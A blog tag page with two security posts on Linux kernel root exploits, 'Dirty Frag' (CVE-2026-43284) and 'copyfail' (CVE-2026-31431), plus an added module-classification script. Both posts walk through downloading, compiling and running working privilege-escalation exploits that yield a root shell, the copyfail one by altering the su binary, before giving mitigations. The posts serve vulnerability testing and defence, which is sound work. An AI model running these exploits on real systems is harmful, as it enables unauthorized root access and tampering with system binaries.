
2 posts tagged with "cybersecurity"


CVE-2026-43284 Dirty Frag mitigation

· 3 min read
Idriss Neumann
founder cwcloud.tech

After CopyFail, here is another major vulnerability, discovered by Hyunwoo Kim (@v4bel) with the help of AI and known as "Dirty Frag" (CVE-2026-43284), which allows a non-root local user to escalate privileges and become root.

We provide a demo that you can use in order to test if your system is vulnerable to this issue.

warning

Do not use this code on systems you do not own or explicitly have permission to test.

Testing

On a local machine

With root privileges, run the following command to install the necessary dependencies if they are not already present (dnf applies to RHEL-based distributions such as AlmaLinux; use your distribution's package manager otherwise):

root# dnf install git gcc -y

Then without root privileges, run the following command to clone the repository and compile the exploit:

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag.git
$ cd dirtyfrag
$ gcc -O0 -Wall -o dirtyfrag-demo demo.c
$ ./dirtyfrag-demo
root#

You can also quickly test with this script:

$ curl https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag/-/raw/main/dirtyfrag-demo.sh > dirtyfrag-demo.sh
$ chmod +x dirtyfrag-demo.sh
$ ./dirtyfrag-demo.sh
root#

Demo with AlmaLinux:

[Demo recording: dirtyfrag-demo]

warning

After running the exploit, you have to either run the following command with root privileges to drop the page cache, or reboot the system:

root# echo 3 > /proc/sys/vm/drop_caches

With docker compose

Unlike the CopyFail exploit, this one does not seem to work from inside OCI/Docker containers built on the major distribution base images such as Ubuntu, Alpine or AlmaLinux, even on a vulnerable host. You can test it with the following commands:

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag.git >/dev/null 2>&1
$ cd dirtyfrag/
$ docker compose up -d alpine --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-alpine
dirtyfrag: failed (rc=1)
$ docker compose up -d ubuntu --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-ubuntu
dirtyfrag: failed (rc=1)
$ docker compose up -d almalinux --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-almalinux
dirtyfrag: failed (rc=1)

Demo on a vulnerable host:

[Demo recording: dirtyfrag-docker]

Mitigation

The mitigation unloads the affected kernel modules with modprobe. Run this script with root privileges, then reboot:

root# curl https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag/-/raw/main/dirtyfrag-mitigation.sh > dirtyfrag-mitigation.sh
root# chmod +x dirtyfrag-mitigation.sh
root# ./dirtyfrag-mitigation.sh
root# /sbin/reboot

warning

You have to reboot the system after running the mitigation script: as the demo below shows, the system remains vulnerable until you do.

[Demo recording: dirtyfrag-mitigation]

Conclusion

With AI-assisted vulnerability research, we can expect many more exploits like this one to be discovered in the future, so it is important to keep an eye on them and apply the necessary mitigations as quickly as their criticality warrants.

In this case the mitigation is quite simple and does not require a kernel update, but that is not the case for every vulnerability (CopyFail, for instance).


CVE-2026-31431 copyfail mitigation

· 2 min read
Idriss Neumann
founder cwcloud.tech

Xint recently disclosed a very critical vulnerability in the Linux kernel, CVE-2026-31431, which allows local attackers to gain root privileges. More details about how this vulnerability works can be found in the Xint blog post.

We provide a demo that you can use in order to test if your system is vulnerable to this issue.

warning

Do not use this code on systems you do not own or explicitly have permission to test.

warning

Be careful to back up your original su binary, as this exploit modifies it.

Testing

On a local machine

First, back up the su binary on your system, as the exploit modifies it:

root# cp /usr/bin/su /usr/bin/su.bak

Then, as a non-root user, run the following commands to execute the exploit script:

user$ curl https://gitlab.cwcloud.tech/oss/cybersec/cve-2026-31431-demo/-/raw/main/cve-2026-31431.py > cve-2026-31431.py
user$ python3 cve-2026-31431.py
root#

Then restore the original su binary:

root# mv /usr/bin/su.bak /usr/bin/su

With docker compose

This is the safer option, with better isolation: the su binary that gets modified is the container's, not your host's.

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/cve-2026-31431-demo.git
$ cd cve-2026-31431-demo
$ docker compose up -d --build --force-recreate
$ docker exec -it cve-2026-31431 /bin/bash
demo@8536b73279be:/app$ su -
#

Mitigation

Xint provided a mitigation that works on several distributions, including Debian and Ubuntu:

root# echo 3 > /proc/sys/vm/drop_caches
root# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
root# rmmod algif_aead 2>/dev/null || true

However, because the rmmod error is hidden by the 2>/dev/null || true, many people do not realise that this mitigation does not work on every distribution. On RHEL-based distributions the module is compiled into the kernel as a builtin, so rmmod cannot unload it, the modprobe.d install rule has nothing to block, and the only sign of failure is the following error message, which the one-liner discards:

rmmod: ERROR: Module algif_aead module is builtin.

Here is a demo showing that the mitigation does not work on AlmaLinux:

[Demo recording: cve-2026-31431 mitigation]

Unfortunately, every mitigation for those distributions requires a reboot. Here is one of the simplest, to use until a patched kernel is available: the initcall_blacklist= kernel parameter prevents the named initcall from running at boot, so the builtin module is never registered.

root# grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
root# reboot
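Before relying on either mitigation, a practitioner wants to know up front whether the target module is loadable (rmmod plus a modprobe.d rule is enough) or builtin (only initcall_blacklist plus a reboot can help), rather than discovering it from a swallowed error. The following script is an added example, not code from the original post or from the cwcloud.tech repositories: it classifies a module from the formats of /proc/modules and /lib/modules/$(uname -r)/modules.builtin and prints the matching mitigation commands. The two sample hosts are constructed files, not captures from real systems, and the <module>_init initcall name is an assumption generalised from the algif_aead_init value shown above. The same loadable-versus-builtin check applies to any module-based mitigation, including the Dirty Frag script in the previous post.

```shell
#!/bin/sh
# Added example (not from the original post or the cwcloud.tech repositories).
# Classify a kernel module as loaded / builtin / not-loaded and print the
# mitigation path that can actually work for it.
#
# Assumptions:
#  - /proc/modules lists loaded modules one per line, module name first.
#  - modules.builtin lists builtin objects as kernel/<path>/<name>.ko.
#  - the initcall to blacklist is named <module>_init (true for algif_aead_init
#    per the post; assumed here for other modules).

# module_status NAME PROC_MODULES BUILTIN_LIST -> loaded | builtin | not-loaded
module_status() {
    name="$1"; proc_modules="$2"; builtin_list="$3"
    # /proc/modules normalises '-' to '_'; on-disk .ko names may use either
    pat=$(printf '%s' "$name" | sed 's/_/[-_]/g')
    if awk -v m="$name" '$1 == m { found = 1 } END { exit !found }' "$proc_modules"; then
        echo loaded
    elif grep -q "/${pat}\.ko$" "$builtin_list"; then
        echo builtin
    else
        echo not-loaded
    fi
}

# mitigation_for NAME PROC_MODULES BUILTIN_LIST -> commands to run, one per line
mitigation_for() {
    name="$1"
    case "$(module_status "$1" "$2" "$3")" in
    loaded)
        # loadable and resident: drop caches, block future autoload, unload now
        printf '%s\n' \
            "echo 3 > /proc/sys/vm/drop_caches" \
            "echo 'install $name /bin/false' > /etc/modprobe.d/disable-$name.conf" \
            "rmmod $name"
        ;;
    builtin)
        # compiled into the kernel: rmmod and modprobe.d cannot help,
        # so keep its initcall from running at the next boot
        printf '%s\n' \
            "grubby --update-kernel=ALL --args=\"initcall_blacklist=${name}_init\"" \
            "reboot"
        ;;
    not-loaded)
        # loadable but not resident: just prevent autoloading
        printf '%s\n' \
            "echo 'install $name /bin/false' > /etc/modprobe.d/disable-$name.conf"
        ;;
    esac
}

# Constructed sample files standing in for two hosts (not real captures).
SAMPLE_DIR=$(mktemp -d)
# Debian-like host: algif_aead is a loadable module and is currently loaded
printf 'algif_aead 16384 0 - Live 0x0000000000000000\nxt_conntrack 16384 1 - Live 0x0000000000000000\n' \
    > "$SAMPLE_DIR/proc_modules_deb"
printf 'kernel/crypto/af_alg.ko\nkernel/crypto/xor.ko\n' > "$SAMPLE_DIR/builtin_deb"
# RHEL-like host: algif_aead is builtin, so it never shows up in /proc/modules
printf 'xt_conntrack 16384 1 - Live 0x0000000000000000\n' > "$SAMPLE_DIR/proc_modules_rhel"
printf 'kernel/crypto/af_alg.ko\nkernel/crypto/algif_aead.ko\n' > "$SAMPLE_DIR/builtin_rhel"

# Against a live system, call it with the real files:
#   mitigation_for algif_aead /proc/modules "/lib/modules/$(uname -r)/modules.builtin"
mitigation_for algif_aead "$SAMPLE_DIR/proc_modules_deb" "$SAMPLE_DIR/builtin_deb"
mitigation_for algif_aead "$SAMPLE_DIR/proc_modules_rhel" "$SAMPLE_DIR/builtin_rhel"
```

The script only prints the commands; review them and run them as root yourself. On the RHEL-like sample it prints the grubby and reboot lines, which is exactly the case the silent rmmod one-liner gets wrong.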

Here is a demo of the mitigation working on the same AlmaLinux system (after restoring the original su binary):

[Demo recording: cve-2026-31431 mitigation]
